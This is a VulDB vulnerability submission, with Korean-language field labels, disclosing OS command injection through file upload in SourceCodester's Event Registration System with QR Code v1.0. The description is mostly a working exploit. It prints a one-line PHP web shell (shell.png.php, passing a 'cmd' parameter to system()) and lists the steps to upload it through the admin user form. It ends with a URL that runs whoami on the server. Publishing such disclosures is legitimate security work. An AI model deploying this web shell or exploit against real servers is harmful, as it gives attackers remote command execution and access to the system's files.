| 제목 | OS command injection via File Upload in Event Registration System with QR Code |
|---|
| 설명 | # Exploit Title: Event Registration System with QR Code
# Exploit Author: Krutika Thakur
# Vendor Name: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/14884/event-registration-system-qr-code-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/php/14884/event-registration-system-qr-code-php-free-source-code.html
# Version: v1.0
# Tested on: Windows 10, Apache
Description:-
A OS command injection via File Upload issue in Event Registration System with QR Code App v.1.0 allows to inject OS command injection which can leads to all internal files in the system
Payload: shell.png.php
<?php echo "Shell";system($_GET['cmd']); ?>
Steps:
1) Login as ADMIN
2) Now go to http://localhost/event/admin/?page=user/list and add user
3) Now fill the details and upload a malicious file.
Payload: shell.png.php
<?php echo "Shell";system($_GET['cmd']); ?>
4) Now save the user
5) Open the image in new tab and in the above url type the below command
http://localhost/event/uploads/1669472280_shell.png.php?cmd=whoami
6) As we can see the OS command injection has been executed |
|---|
| 사용자 | lucifoxer001 (UID 33693) |
|---|
| 제출 | 2022. 11. 26. PM 03:26 (4 연령 ago) |
|---|
| 모더레이션 | 2022. 11. 30. AM 11:50 (4 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 214590 [SourceCodester Event Registration System 1.0 cmd 권한 상승] |
|---|
| 포인트들 | 17 |
|---|